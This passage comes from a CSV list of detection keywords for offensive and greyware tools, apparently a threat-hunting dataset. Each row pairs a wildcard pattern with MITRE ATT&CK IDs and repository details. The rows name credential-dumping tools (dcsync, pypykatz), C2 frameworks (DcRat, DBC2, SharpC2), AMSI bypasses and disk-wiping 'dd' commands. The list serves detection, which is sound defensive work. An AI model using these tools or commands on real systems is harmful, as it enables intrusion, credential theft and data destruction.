TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP_Reflective_DLL*","offensive_tool_keyword","dazzleUP","A tool 
that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP-master*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*db2_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*db2_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*DBC2.git*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2_agent.cs*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2_agent.exe*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell 
modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2Loader.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2Loader.exe*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2Loader.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2LoaderWrapperCLR.*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2LoaderWrapperCLR_x64.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dbc2LoaderWrapperCLR_x86.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*DBC2-master.zip*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*dbdbnchagbkhknegmhgikkleoogjcfge*","greyware_tool_keyword","Hideman VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*dbGetNimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*dccon.exe -encrypt2*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcenum.run*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD 
Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*dchrastil*","offensive_tool_keyword","Github Username","github user name hosting exploitation tools:hacker. scripting. recon. OSINT. automation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dchrastil","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--dc-ip *--check-user-access*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" +"*dcipher-cli*","offensive_tool_keyword","dcipher-cli","Crack hashes using online rainbow & lookup table attack services. right from your terminal.","T1110.001 - T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/k4m4/dcipher-cli","1","0","N/A","N/A","3","224","30","2023-01-05T16:13:56Z","2018-04-08T18:21:44Z" +"*dcomexec -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*dcomexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dcomhijack.cna*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomhijack.py*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*dcomhijack-main*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*DCOMPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*DCOMPotato-master*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege 
abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*DCOMReflection.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*DcRat 1.0.7*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.7z*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat_png.png*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" 
+"*DcRat-main.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*dcrypt_bartpe.zip*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcrypt_install.iss*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcrypt_setup_*.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcrypt_winpe.zip*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*dcsync -Domain*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*dcsync.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*dcsync.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*dcsync@protonmail.com*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
+"*dcsync_inject*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*dcsyncattack(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*dcsyncattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the 
host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*dcsyncattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dcsyncclient.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*dcsyncclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*dcsyncclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dd if=/dev/nul*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*dd if=/dev/zero*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" 
+"*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*deb.torproject.org/torproject.org/*.asc*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*DebugAmsi.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsi.sln*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsi.vcxproj*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger 